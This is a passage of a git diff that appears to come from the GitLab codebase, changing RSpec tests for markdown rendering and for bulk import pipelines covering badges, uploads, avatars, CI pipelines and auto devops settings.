data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>twenty <a href="#fnref-_twenty-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> - </ol></section> + </ol> + </section> EOF end it 'properly adds the necessary ids and classes' do stub_commonmark_sourcepos_disabled - expect(html.lines.map(&:strip).join("\n")).to eq filtered_footnote + expect(html.lines.map(&:strip).join("\n")).to eq filtered_footnote.strip end context 'using ruby-based HTML renderer' do diff --git a/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb b/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb index 394fcc06eba..c8cd9d4fcac 100644 --- 
a/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb +++ b/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb @@ -71,7 +71,7 @@ RSpec.describe Banzai::Pipeline::PlainMarkdownPipeline do let(:markdown) { %Q(``` foo\\@bar\nfoo\n```) } it 'renders correct html' do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) correct_html_included(markdown, %Q(<pre data-sourcepos="1:1-3:3" lang="foo@bar"><code>foo\n</code></pre>)) else correct_html_included(markdown, %Q(<code lang="foo@bar">foo\n</code>)) diff --git a/spec/lib/banzai/reference_parser/base_parser_spec.rb b/spec/lib/banzai/reference_parser/base_parser_spec.rb index 4701caa0667..d31ccccd6c3 100644 --- a/spec/lib/banzai/reference_parser/base_parser_spec.rb +++ b/spec/lib/banzai/reference_parser/base_parser_spec.rb @@ -29,10 +29,10 @@ RSpec.describe Banzai::ReferenceParser::BaseParser do describe '#project_for_node' do it 'returns the Project for a node' do - document = instance_double('document', fragment?: false) - project = instance_double('project') - object = instance_double('object', project: project) - node = instance_double('node', document: document) + document = double('document', fragment?: false) + project = instance_double('Project') + object = double('object', project: project) + node = double('node', document: document) context.associate_document(document, object) diff --git a/spec/lib/banzai/render_context_spec.rb b/spec/lib/banzai/render_context_spec.rb index c4b609b936e..4b5c2c5a7df 100644 --- a/spec/lib/banzai/render_context_spec.rb +++ b/spec/lib/banzai/render_context_spec.rb @@ -7,15 +7,15 @@ RSpec.describe Banzai::RenderContext do describe '#project_for_node' do it 'returns the default project if no associated project was found' do - project = instance_double('project') + project = instance_double('Project') context = described_class.new(project) expect(context.project_for_node(document)).to eq(project) end it 'returns the 
associated project if one was associated explicitly' do - project = instance_double('project') - obj = instance_double('object', project: project) + project = instance_double('Project') + obj = double('object', project: project) context = described_class.new context.associate_document(document, obj) @@ -24,8 +24,8 @@ RSpec.describe Banzai::RenderContext do end it 'returns the project associated with a DocumentFragment when using a node' do - project = instance_double('project') - obj = instance_double('object', project: project) + project = instance_double('Project') + obj = double('object', project: project) context = described_class.new node = document.children.first diff --git a/spec/lib/bulk_imports/clients/http_spec.rb b/spec/lib/bulk_imports/clients/http_spec.rb index 623f9aa453a..1bbc96af8ee 100644 --- a/spec/lib/bulk_imports/clients/http_spec.rb +++ b/spec/lib/bulk_imports/clients/http_spec.rb @@ -38,11 +38,11 @@ RSpec.describe BulkImports::Clients::HTTP do context 'when response is not success' do it 'raises BulkImports::Error' do - response_double = double(code: 503, success?: false) + response_double = double(code: 503, success?: false, request: double(path: double(path: '/test'))) allow(Gitlab::HTTP).to receive(method).and_return(response_double) - expect { subject.public_send(method, resource) }.to raise_exception(BulkImports::NetworkError) + expect { subject.public_send(method, resource) }.to raise_exception(BulkImports::NetworkError, 'Unsuccessful response 503 from /test') end end end diff --git a/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb new file mode 100644 index 00000000000..6c5465c8a66 --- /dev/null +++ b/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb @@ -0,0 +1,96 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Common::Pipelines::BadgesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) 
{ create(:group) } + let_it_be(:project) { create(:project) } + + let(:entity) { create(:bulk_import_entity, group: group) } + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + let(:first_page) { extracted_data(has_next_page: true) } + let(:last_page) { extracted_data(name: 'badge2') } + + before do + allow_next_instance_of(BulkImports::Common::Extractors::RestExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(first_page, last_page) + end + end + + it 'imports a group badge' do + expect { pipeline.run }.to change(Badge, :count).by(2) + + badge = group.badges.last + + expect(badge.name).to eq('badge2') + expect(badge.link_url).to eq(badge_data['link_url']) + expect(badge.image_url).to eq(badge_data['image_url']) + end + + context 'when project entity' do + let(:first_page) { extracted_data(has_next_page: true) } + let(:last_page) { extracted_data(name: 'badge2', kind: 'project') } + let(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + + it 'imports a project badge & skips group badge' do + expect { pipeline.run }.to change(Badge, :count).by(1) + + badge = project.badges.last + + expect(badge.name).to eq('badge2') + expect(badge.link_url).to eq(badge_data['link_url']) + expect(badge.image_url).to eq(badge_data['image_url']) + expect(badge.type).to eq('ProjectBadge') + end + end + + describe '#transform' do + it 'return transformed badge hash' do + badge = subject.transform(context, badge_data) + + expect(badge[:name]).to eq('badge') + expect(badge[:link_url]).to eq(badge_data['link_url']) + expect(badge[:image_url]).to eq(badge_data['image_url']) + expect(badge.keys).to contain_exactly(:name, :link_url, :image_url) + end + + context 'when data is blank' do + it 'does nothing when the data is blank' do + expect(subject.transform(context, nil)).to be_nil + end 
+ end + + context 'when project entity & group badge' do + let(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + + it 'returns' do + expect(subject.transform(context, { 'name' => 'test', 'kind' => 'group' })).to be_nil + end + end + end + + def badge_data(name = 'badge', kind = 'group') + { + 'name' => name, + 'link_url' => 'https://gitlab.example.com', + 'image_url' => 'https://gitlab.example.com/image.png', + 'kind' => kind + } + end + + def extracted_data(name: 'badge', kind: 'group', has_next_page: false) + page_info = { + 'has_next_page' => has_next_page, + 'next_page' => has_next_page ? '2' : nil + } + + BulkImports::Pipeline::ExtractedData.new(data: [badge_data(name, kind)], page_info: page_info) + end + end +end diff --git a/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb index 9e3a6d5b8df..48db24def48 100644 --- a/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb @@ -59,16 +59,6 @@ RSpec.describe BulkImports::Common::Pipelines::LabelsPipeline do end end - context 'when label is persisted' do - it 'does not save label' do - label = create(:group_label, group: group) - - expect(label).not_to receive(:save!) 
- - subject.load(context, label) - end - end - context 'when label is missing' do it 'returns' do expect(subject.load(context, nil)).to be_nil diff --git a/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb index 9f71175f46f..902b29bc365 100644 --- a/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb @@ -81,16 +81,6 @@ RSpec.describe BulkImports::Common::Pipelines::MilestonesPipeline do end end - context 'when milestone is persisted' do - it 'does not save milestone' do - milestone = create(:milestone, group: group) - - expect(milestone).not_to receive(:save!) - - subject.load(context, milestone) - end - end - context 'when milestone is missing' do it 'returns' do expect(subject.load(context, nil)).to be_nil diff --git a/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb index a3cc866a406..0f6238e10dc 100644 --- a/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb @@ -5,11 +5,12 @@ require 'spec_helper' RSpec.describe BulkImports::Common::Pipelines::UploadsPipeline do let_it_be(:tmpdir) { Dir.mktmpdir } let_it_be(:project) { create(:project) } - let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project, source_full_path: 'test') } - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - let_it_be(:uploads_dir_path) { File.join(tmpdir, '72a497a02fe3ee09edae2ed06d390038') } - let_it_be(:upload_file_path) { File.join(uploads_dir_path, 'upload.txt')} + let_it_be(:group) { create(:group) } + + let(:uploads_dir_path) { File.join(tmpdir, '72a497a02fe3ee09edae2ed06d390038') } + let(:upload_file_path) { File.join(uploads_dir_path, 
'upload.txt')} + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } subject(:pipeline) { described_class.new(context) } @@ -24,57 +25,101 @@ RSpec.describe BulkImports::Common::Pipelines::UploadsPipeline do FileUtils.remove_entry(tmpdir) if Dir.exist?(tmpdir) end - describe '#run' do - it 'imports uploads into destination portable and removes tmpdir' do - allow(Dir).to receive(:mktmpdir).with('bulk_imports').and_return(tmpdir) - allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [upload_file_path])) + shared_examples 'uploads import' do + describe '#run' do + before do + allow(Dir).to receive(:mktmpdir).with('bulk_imports').and_return(tmpdir) + allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [upload_file_path])) + end - pipeline.run + it 'imports uploads into destination portable and removes tmpdir' do + pipeline.run - expect(project.uploads.map { |u| u.retrieve_uploader.filename }).to include('upload.txt') + expect(portable.uploads.map { |u| u.retrieve_uploader.filename }).to include('upload.txt') - expect(Dir.exist?(tmpdir)).to eq(false) - end - end + expect(Dir.exist?(tmpdir)).to eq(false) + end - describe '#extract' do - it 'downloads & extracts upload paths' do - allow(Dir).to receive(:mktmpdir).and_return(tmpdir) - expect(pipeline).to receive(:untar_zxf) - file_download_service = instance_double("BulkImports::FileDownloadService") + context 'when importing avatar' do + let(:uploads_dir_path) { File.join(tmpdir, 'avatar') } - expect(BulkImports::FileDownloadService) - .to receive(:new) - .with( - configuration: context.configuration, - relative_url: "/projects/test/export_relations/download?relation=uploads", - dir: tmpdir, - filename: 'uploads.tar.gz') - .and_return(file_download_service) + it 'imports avatar' do + FileUtils.touch(File.join(uploads_dir_path, 'avatar.png')) - 
expect(file_download_service).to receive(:execute) + expect_next_instance_of(entity.update_service) do |service| + expect(service).to receive(:execute) + end - extracted_data = pipeline.extract(context) + pipeline.run + end - expect(extracted_data.data).to contain_exactly(uploads_dir_path, upload_file_path) - end - end + context 'when something goes wrong' do + it 'raises exception' do + allow_next_instance_of(entity.update_service) do |service| + allow(service).to receive(:execute).and_return(nil) + end + + pipeline.run - describe '#load' do - it 'creates a file upload' do - expect { pipeline.load(context, upload_file_path) }.to change { project.uploads.count }.by(1) + expect(entity.failures.first.exception_class).to include('AvatarLoadingError') + end + end + end end - context 'when dynamic path is nil' do - it 'returns' do - expect { pipeline.load(context, File.join(tmpdir, 'test')) }.not_to change { project.uploads.count } + describe '#extract' do + it 'downloads & extracts upload paths' do + allow(Dir).to receive(:mktmpdir).and_return(tmpdir) + expect(pipeline).to receive(:untar_zxf) + file_download_service = instance_double("BulkImports::FileDownloadService") + + expect(BulkImports::FileDownloadService) + .to receive(:new) + .with( + configuration: context.configuration, + relative_url: "/#{entity.pluralized_name}/test/export_relations/download?relation=uploads", + dir: tmpdir, + filename: 'uploads.tar.gz') + .and_return(file_download_service) + + expect(file_download_service).to receive(:execute) + + extracted_data = pipeline.extract(context) + + expect(extracted_data.data).to contain_exactly(uploads_dir_path, upload_file_path) end end - context 'when path is a directory' do - it 'returns' do - expect { pipeline.load(context, uploads_dir_path) }.not_to change { project.uploads.count } + describe '#load' do + it 'creates a file upload' do + expect { pipeline.load(context, upload_file_path) }.to change { portable.uploads.count }.by(1) + end + + context 'when 
dynamic path is nil' do + it 'returns' do + expect { pipeline.load(context, File.join(tmpdir, 'test')) }.not_to change { portable.uploads.count } + end + end + + context 'when path is a directory' do + it 'returns' do + expect { pipeline.load(context, uploads_dir_path) }.not_to change { portable.uploads.count } + end end end end + + context 'when importing to group' do + let(:portable) { group } + let(:entity) { create(:bulk_import_entity, :group_entity, group: group, source_full_path: 'test') } + + include_examples 'uploads import' + end + + context 'when importing to project' do + let(:portable) { project } + let(:entity) { create(:bulk_import_entity, :project_entity, project: project, source_full_path: 'test') } + + include_examples 'uploads import' + end end diff --git a/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb b/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb new file mode 100644 index 00000000000..0a04c0a2243 --- /dev/null +++ b/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb @@ -0,0 +1,36 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Common::Rest::GetBadgesQuery do + describe '.to_h' do + shared_examples 'resource and page info query' do + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + let(:encoded_full_path) { ERB::Util.url_encode(entity.source_full_path) } + + it 'returns correct query and page info' do + expected = { + resource: [entity.pluralized_name, encoded_full_path, 'badges'].join('/'), + query: { + page: context.tracker.next_page + } + } + + expect(described_class.to_h(context)).to eq(expected) + end + end + + context 'when entity is group' do + let(:entity) { create(:bulk_import_entity) } + + include_examples 'resource and page info query' + end + + context 'when entity is project' do + let(:entity) { create(:bulk_import_entity, :project_entity) } + + include_examples 'resource and 
page info query' + end + end +end diff --git a/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb b/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb deleted file mode 100644 index 9fa35c4707d..00000000000 --- a/spec/lib/bulk_imports/groups/pipelines/badges_pipeline_spec.rb +++ /dev/null @@ -1,116 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Pipelines::BadgesPipeline do - let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - - let_it_be(:entity) do - create( - :bulk_import_entity, - source_full_path: 'source/full/path', - destination_name: 'My Destination Group', - destination_namespace: group.full_path, - group: group - ) - end - - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - - subject { described_class.new(context) } - - describe '#run' do - it 'imports a group badge' do - first_page = extracted_data(has_next_page: true) - last_page = extracted_data(name: 'badge2') - - allow_next_instance_of(BulkImports::Common::Extractors::RestExtractor) do |extractor| - allow(extractor) - .to receive(:extract) - .and_return(first_page, last_page) - end - - expect { subject.run }.to change(Badge, :count).by(2) - - badge = group.badges.last - - expect(badge.name).to eq('badge2') - expect(badge.link_url).to eq(badge_data['link_url']) - expect(badge.image_url).to eq(badge_data['image_url']) - end - - describe '#load' do - it 'creates a badge' do - expect { subject.load(context, badge_data) }.to change(Badge, :count).by(1) - - badge = group.badges.first - - badge_data.each do |key, value| - expect(badge[key]).to eq(value) - end - end - - it 'does nothing when the data is blank' do - expect { subject.load(context, nil) }.not_to change(Badge, :count) - end - end - - describe '#transform' do - it 'return transformed badge hash' do - badge = subject.transform(context, badge_data) - - 
expect(badge[:name]).to eq('badge') - expect(badge[:link_url]).to eq(badge_data['link_url']) - expect(badge[:image_url]).to eq(badge_data['image_url']) - expect(badge.keys).to contain_exactly(:name, :link_url, :image_url) - end - - context 'when data is blank' do - it 'does nothing when the data is blank' do - expect(subject.transform(context, nil)).to be_nil - end - end - end - - describe 'pipeline parts' do - it { expect(described_class).to include_module(BulkImports::Pipeline) } - it { expect(described_class).to include_module(BulkImports::Pipeline::Runner) } - - it 'has extractors' do - expect(described_class.get_extractor) - .to eq( - klass: BulkImports::Common::Extractors::RestExtractor, - options: { - query: BulkImports::Groups::Rest::GetBadgesQuery - } - ) - end - - it 'has transformers' do - expect(described_class.transformers) - .to contain_exactly( - { klass: BulkImports::Common::Transformers::ProhibitedAttributesTransformer, options: nil } - ) - end - end - - def badge_data(name = 'badge') - { - 'name' => name, - 'link_url' => 'https://gitlab.example.com', - 'image_url' => 'https://gitlab.example.com/image.png' - } - end - - def extracted_data(name: 'badge', has_next_page: false) - page_info = { - 'has_next_page' => has_next_page, - 'next_page' => has_next_page ? 
'2' : nil - } - - BulkImports::Pipeline::ExtractedData.new(data: [badge_data(name)], page_info: page_info) - end - end -end diff --git a/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb b/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb deleted file mode 100644 index c68284aa580..00000000000 --- a/spec/lib/bulk_imports/groups/pipelines/group_avatar_pipeline_spec.rb +++ /dev/null @@ -1,77 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Pipelines::GroupAvatarPipeline do - let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - let_it_be(:bulk_import) { create(:bulk_import, user: user) } - - let_it_be(:entity) do - create( - :bulk_import_entity, - group: group, - bulk_import: bulk_import, - source_full_path: 'source/full/path', - destination_name: 'My Destination Group', - destination_namespace: group.full_path - ) - end - - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - - subject { described_class.new(context) } - - describe '#run' do - it 'updates the group avatar' do - avatar_path = 'spec/fixtures/dk.png' - stub_file_download( - avatar_path, - configuration: context.configuration, - relative_url: "/groups/source%2Ffull%2Fpath/avatar", - dir: an_instance_of(String), - file_size_limit: Avatarable::MAXIMUM_FILE_SIZE, - allowed_content_types: described_class::ALLOWED_AVATAR_DOWNLOAD_TYPES - ) - - expect { subject.run }.to change(context.group, :avatar) - - expect(context.group.avatar.filename).to eq(File.basename(avatar_path)) - end - - it 'raises an error when the avatar upload fails' do - avatar_path = 'spec/fixtures/aosp_manifest.xml' - stub_file_download( - avatar_path, - configuration: context.configuration, - relative_url: "/groups/source%2Ffull%2Fpath/avatar", - dir: an_instance_of(String), - file_size_limit: Avatarable::MAXIMUM_FILE_SIZE, - 
allowed_content_types: described_class::ALLOWED_AVATAR_DOWNLOAD_TYPES - ) - - expect_next_instance_of(Gitlab::Import::Logger) do |logger| - expect(logger).to receive(:error) - .with( - bulk_import_id: context.bulk_import.id, - bulk_import_entity_id: context.entity.id, - bulk_import_entity_type: context.entity.source_type, - context_extra: context.extra, - exception_class: "BulkImports::Groups::Pipelines::GroupAvatarPipeline::GroupAvatarLoadingError", - exception_message: "Avatar file format is not supported. Please try one of the following supported formats: image/png, image/jpeg, image/gif, image/bmp, image/tiff, image/vnd.microsoft.icon", - pipeline_class: "BulkImports::Groups::Pipelines::GroupAvatarPipeline", - pipeline_step: :loader - ) - end - - expect { subject.run }.to change(BulkImports::Failure, :count) - end - end - - def stub_file_download(filepath = 'file/path.png', **params) - expect_next_instance_of(BulkImports::FileDownloadService, params.presence) do |downloader| - expect(downloader).to receive(:execute).and_return(filepath) - end - end -end diff --git a/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb b/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb deleted file mode 100644 index eef6848e118..00000000000 --- a/spec/lib/bulk_imports/groups/rest/get_badges_query_spec.rb +++ /dev/null @@ -1,22 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe BulkImports::Groups::Rest::GetBadgesQuery do - describe '.to_h' do - it 'returns query resource and page info' do - entity = create(:bulk_import_entity) - tracker = create(:bulk_import_tracker, entity: entity) - context = BulkImports::Pipeline::Context.new(tracker) - encoded_full_path = ERB::Util.url_encode(entity.source_full_path) - expected = { - resource: ['groups', encoded_full_path, 'badges'].join('/'), - query: { - page: context.tracker.next_page - } - } - - expect(described_class.to_h(context)).to eq(expected) - end - end -end diff --git 
a/spec/lib/bulk_imports/groups/stage_spec.rb b/spec/lib/bulk_imports/groups/stage_spec.rb index 5719acac4d7..55a8e40f480 100644 --- a/spec/lib/bulk_imports/groups/stage_spec.rb +++ b/spec/lib/bulk_imports/groups/stage_spec.rb @@ -8,13 +8,13 @@ RSpec.describe BulkImports::Groups::Stage do let(:pipelines) do [ [0, BulkImports::Groups::Pipelines::GroupPipeline], - [1, BulkImports::Groups::Pipelines::GroupAvatarPipeline], [1, BulkImports::Groups::Pipelines::SubgroupEntitiesPipeline], [1, BulkImports::Groups::Pipelines::MembersPipeline], [1, BulkImports::Common::Pipelines::LabelsPipeline], [1, BulkImports::Common::Pipelines::MilestonesPipeline], - [1, BulkImports::Groups::Pipelines::BadgesPipeline], - [2, BulkImports::Common::Pipelines::BoardsPipeline] + [1, BulkImports::Common::Pipelines::BadgesPipeline], + [2, BulkImports::Common::Pipelines::BoardsPipeline], + [2, BulkImports::Common::Pipelines::UploadsPipeline] ] end @@ -24,7 +24,7 @@ RSpec.describe BulkImports::Groups::Stage do describe '.pipelines' do it 'list all the pipelines with their stage number, ordered by stage' do - expect(described_class.new(bulk_import).pipelines & pipelines).to eq(pipelines) + expect(described_class.new(bulk_import).pipelines & pipelines).to contain_exactly(*pipelines) expect(described_class.new(bulk_import).pipelines.last.last).to eq(BulkImports::Common::Pipelines::EntityFinisher) end diff --git a/spec/lib/bulk_imports/ndjson_pipeline_spec.rb b/spec/lib/bulk_imports/ndjson_pipeline_spec.rb index c5197fb29d9..8ea6ceb7619 100644 --- a/spec/lib/bulk_imports/ndjson_pipeline_spec.rb +++ b/spec/lib/bulk_imports/ndjson_pipeline_spec.rb @@ -130,6 +130,22 @@ RSpec.describe BulkImports::NdjsonPipeline do subject.transform(context, data) end + + context 'when data is nil' do + before do + expect(Gitlab::ImportExport::Group::RelationFactory).not_to receive(:create) + end + + it 'returns' do + expect(subject.transform(nil, nil)).to be_nil + end + + context 'when relation hash is nil' do + it 
'returns' do + expect(subject.transform(nil, [nil, 0])).to be_nil + end + end + end end describe '#load' do @@ -143,16 +159,6 @@ RSpec.describe BulkImports::NdjsonPipeline do end end - context 'when object is persisted' do - it 'does not save the object' do - object = double(persisted?: true) - - expect(object).not_to receive(:save!) - - subject.load(nil, object) - end - end - context 'when object is missing' do it 'returns' do expect(subject.load(nil, nil)).to be_nil diff --git a/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb b/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb new file mode 100644 index 00000000000..b680fa5cbfc --- /dev/null +++ b/spec/lib/bulk_imports/projects/graphql/get_snippet_repository_query_spec.rb @@ -0,0 +1,58 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Graphql::GetSnippetRepositoryQuery do + describe 'query repository based on full_path' do + let_it_be(:entity) { create(:bulk_import_entity) } + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + it 'has a valid query' do + query = GraphQL::Query.new( + GitlabSchema, + described_class.to_s, + variables: described_class.variables(context) + ) + result = GitlabSchema.static_validator.validate(query) + + expect(result[:errors]).to be_empty + end + + it 'returns snippet httpUrlToRepo' do + expect(described_class.to_s).to include('httpUrlToRepo') + end + + it 'returns snippet createdAt' do + expect(described_class.to_s).to include('createdAt') + end + + it 'returns snippet title' do + expect(described_class.to_s).to include('title') + end + + describe '.variables' do + it 'queries project based on source_full_path and pagination' do + expected = { full_path: entity.source_full_path, cursor: nil, per_page: 500 } + + expect(described_class.variables(context)).to eq(expected) + end + end + + 
describe '.data_path' do + it '.data_path returns data path' do + expected = %w[data project snippets nodes] + + expect(described_class.data_path).to eq(expected) + end + end + + describe '.page_info_path' do + it '.page_info_path returns pagination information path' do + expected = %w[data project snippets page_info] + + expect(described_class.page_info_path).to eq(expected) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb new file mode 100644 index 00000000000..e2744a6a457 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/auto_devops_pipeline_spec.rb @@ -0,0 +1,52 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::AutoDevopsPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + let(:auto_devops) do + { + 'created_at' => '2016-06-13T15:02:47.967Z', + 'updated_at' => '2016-06-14T15:02:47.967Z', + 'enabled' => true, + 'deploy_strategy' => 'continuous' + } + end + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + it 'imports auto devops options into destination project' do + group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: 
[auto_devops])) + end + + pipeline.run + + expect(project.auto_devops.enabled).to be_truthy + expect(project.auto_devops.deploy_strategy).to eq('continuous') + expect(project.auto_devops.created_at).to eq('2016-06-13T15:02:47.967Z') + expect(project.auto_devops.updated_at).to eq('2016-06-14T15:02:47.967Z') + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb new file mode 100644 index 00000000000..98a2e8b6a57 --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/ci_pipelines_pipeline_spec.rb @@ -0,0 +1,176 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::CiPipelinesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:bulk_import) { create(:bulk_import, user: user) } + let_it_be(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: group.full_path + ) + end + + let(:ci_pipeline_attributes) { {} } + let(:ci_pipeline) do + { + sha: "fakesha", + ref: "fakeref", + project: project, + source: "web" + }.merge(ci_pipeline_attributes) + end + + let(:ci_pipeline2) do + { + sha: "fakesha2", + ref: "fakeref2", + project: project, + source: "web" + }.merge(ci_pipeline_attributes) + end + + let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } + let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + before do + group.add_owner(user) + + allow_next_instance_of(BulkImports::Common::Extractors::NdjsonExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return( + 
BulkImports::Pipeline::ExtractedData.new(data: [ci_pipeline, ci_pipeline2]) + ) + end + + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_source_branch!) + end + + pipeline.run + end + + it 'imports Ci::Pipeline into destination project' do + expect(project.all_pipelines.count).to eq(2) + expect(project.ci_pipelines.first.sha).to eq('fakesha') + expect(project.ci_pipelines.second.sha).to eq('fakesha2') + end + + context 'notes' do + let(:ci_pipeline_attributes) do + { + 'notes' => [ + { + 'note' => 'test note', + 'author_id' => 22, + 'noteable_type' => 'Commit', + 'sha' => '', + 'author' => { + 'name' => 'User 22' + }, + 'commit_id' => 'fakesha', + 'updated_at' => '2016-06-14T15:02:47.770Z', + 'events' => [ + { + 'action' => 'created', + 'author_id' => 22 + } + ] + } + ] + } + end + + it 'imports pipeline with notes' do + note = project.all_pipelines.first.notes.first + expect(note.note).to include('test note') + expect(note.events.first.action).to eq('created') + end + end + + context 'stages' do + let(:ci_pipeline_attributes) do + { + 'stages' => [ + { + 'name' => 'test stage', + 'statuses' => [ + { + 'name' => 'first status', + 'status' => 'created' + } + ] + } + ] + } + end + + it 'imports pipeline with notes' do + stage = project.all_pipelines.first.stages.first + expect(stage.name).to eq('test stage') + expect(stage.statuses.first.name).to eq('first status') + end + end + + context 'external pull request' do + let(:ci_pipeline_attributes) do + { + 'source' => 'external_pull_request_event', + 'external_pull_request' => { + 'source_branch' => 'test source branch', + 'target_branch' => 'master', + 'source_sha' => 'testsha', + 'target_sha' => 'targetsha', + 'source_repository' => 'test repository', + 'target_repository' => 'test repository', + 'status' => 1, + 'pull_request_iid' => 1 + } + } + end + + it 'imports pipeline with external pull request' do + pull_request = project.all_pipelines.first.external_pull_request + 
expect(pull_request.source_branch).to eq('test source branch') + expect(pull_request.status).to eq('open') + end + end + + context 'merge request' do + let(:ci_pipeline_attributes) do + { + 'source' => 'merge_request_event', + 'merge_request' => { + 'description' => 'test merge request', + 'title' => 'test MR', + 'source_branch' => 'test source branch', + 'target_branch' => 'master', + 'source_sha' => 'testsha', + 'target_sha' => 'targetsha', + 'source_repository' => 'test repository', + 'target_repository' => 'test repository', + 'target_project_id' => project.id, + 'source_project_id' => project.id, + 'author_id' => user.id + } + } + end + + it 'imports pipeline with external pull request' do + merge_request = project.all_pipelines.first.merge_request + expect(merge_request.source_branch).to eq('test source branch') + expect(merge_request.description).to eq('test merge request') + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/container_expiration_policy_pipeline_spec.rb 